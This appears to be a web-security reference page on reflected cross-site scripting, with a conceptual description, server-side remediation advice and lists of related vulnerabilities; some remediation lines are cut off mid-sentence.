Cross Site Scripting (XSS) - Reflected
Summary
rXSS allows an attacker to inject malicious Javascirpt code into a web application, leading to potential unauthorized access, data theft, or session hijacking.
Description
Reflected Cross Site Scripting (rXSS) allows an attacker to inject malicious JavaScript code into a web victim's page. Unlike stored XSS attacks, reflected XSS does not persist on the vulnerable site's database. Instead, the attacker must deliver the payload to the victim (e.g. via a vulnerable URL parameter) and upon page load, the payload will get injected into the victim's browser. Attackers can exploit this vulnerability by injecting malicious scripts, which are executed by unsuspecting users' browsers, leading to potential theft of sensitive information, session hijacking, or unauthorized access.
Remediations
- Validate all user inputs on the server side, ensuring that they meet the application's data requirements and expectations. This includes both alphanumeric validations as well as format validations.
- Encode user-supplied output when it's incorporated into HTML. This makes potentially harmful input safe to display. HTML Entities can be used to safely represent characters, avoiding script interpreta
- Fewer XSS bugs appear in applications built with modern web frameworks like React that help mitigate against XSS using templating, auto-escaping and more. However, regullary ensure developers aren't b
hackstack
Anatomy
Usually follows
Misconfigured CORS
Cross Site Request Forgery (CSRF)
Lack of Security Headers
HTTP Desync
Unrestricted File Upload
CRLF Injection
Usually precedes
Authentication Bypass
Cross Site Scripting (XSS) - Stored
Account Takeover
Open Redirect
Privilege Escalation
Insecure Cookies
Server Side Template Injection (SSTI)
Affected components
Session
Client Side